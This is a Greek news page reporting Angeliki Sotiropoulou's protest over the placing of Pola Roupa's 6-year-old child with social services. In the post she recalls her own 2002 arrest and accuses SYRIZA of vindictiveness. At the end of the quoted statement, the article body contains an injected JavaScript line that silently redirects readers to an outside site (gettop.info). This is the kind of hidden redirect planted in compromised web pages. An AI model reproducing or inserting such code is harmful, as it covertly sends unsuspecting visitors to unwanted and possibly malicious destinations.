Αγγελική Σωτηροπούλου για το παιδί της Ρούπα: Πρωτοφανής και αποκρουστική εκδικητικότητα

0
127

 

Μνήμες από τη δική της σύλληψη για συμμετοχή στην τρομοκρατική οργάνωση 17Νοέμβρη έφερε στην Αγγελική Σωτηροπούλου, σύντροφο του Δημήτρη Κουφοντίνα, η σύλληψη της Πόλας Ρούπα και η απόδοση της επιμέλειας του 6χρονου παιδιού της σε κοινωνικές υπηρεσίες.

Με ανάρτηση της σε γνωστή ιστοσελίδα του αντιεξουσιαστικού χώρου η Αγγελική Σωτηροπούλου εκφράζει την έντονη αντίδραση της στη συγεκκριμένη απόφαση αναφέροντας χαρακτηριστικά:

Ιούνης 2002, το καλοκαίρι της τρομοϋστερίας. Πρώτη προσαγωγή στη ΓΑΔΑ με το 12χρονο γιό μου τον οποίο κρατούν και ανακρίνουν επί 13 ώρες μόνο του σε κάποιο γραφείο. Τη δεύτερη φορά που μας πήραν πάλι με το γιό μου στη ΓΑΔΑ διαμαρτυρήθηκα τόσο ώστε ήρθε ο εισαγγελέας και έστειλε το παιδί σε συγγενείς μου.

Όταν με συνέλαβαν τον Σεπτέμβριο και ενώ τα χρυσοπληρωμένα φερέφωνα των ΜΜΕ ουρλιάζανε να πάει το παιδί σε ίδρυμα κανένας εισαγγελέας δεν τόλμησε να το κάνει και το παιδί χωρίς φασαρία πήγε στη γιαγιά του.

Σήμερα ο ΣΥΡΙΖΑ με μια πρωτοφανή και αποκρουστική εκδικητικότητα, απέναντι στην Πόλα Ρούπα και το Νίκο Μαζιώτη που επαναφέρει τις μαύρες εποχές των παιδουπόλεων, κρατά φρουρούμενο το 6χρονο παιδί τους, μακριά από τους ανθρώπους που γνωρίζει και το αγαπούν. Όσο για την «φροντίδα» κανένας πραγματικά ειδικός στη ψυχική υγεία δε θα άφηνε ένα παιδάκι που έχει υποστεί τέτοιο σοκ χωρίς οικεία πρόσωπα αδιαλείπτως. Κάθε ώρα που περνά η ζημιά μεγαλώνει. Ποιος αναλαμβάνει την ευθύνη γι αυτό; setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here